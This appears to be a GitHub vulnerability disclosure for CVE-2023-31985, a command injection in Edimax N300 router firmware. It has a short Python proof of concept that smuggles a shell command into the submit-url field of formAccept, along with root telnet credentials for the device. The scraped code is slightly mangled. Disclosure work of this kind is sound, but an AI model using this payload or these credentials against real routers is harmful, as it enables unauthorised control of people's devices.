Headline
CVE-2023-31985: CVE/Readme.md at main · Erebua/CVE
A Command Injection vulnerability in Edimax Wireless Router N300 Firmware BR-6428NS_v4 allows attacker to execute arbitrary code via the formAccept function in /bin/webs without any limitations.
Permalink
Command Injection
Command injection without any limitations
Firmware
Wireless: Edimax home Wireless Routers N300
Firmware Version: BR-6428NS_v4_1.10
You can download Firmware at this website and use FirmAE to simulate the router environment.
FirmAE command: ./run.sh -r v4 BR-6428NS_v4_1.10.bin(This will take a while, please be patient:)
Description
The vulnerability was found in /bin/webs.
Function is formAccept
poc
python
import requests
command = “touch /tmp/Swe3ty3”
url = “http://192.168.2.1/goform/formAccept” data = { "submit-url":command }
r = requests.post(url,data=data) print(r.text)
use root/edimaxens telnet to the router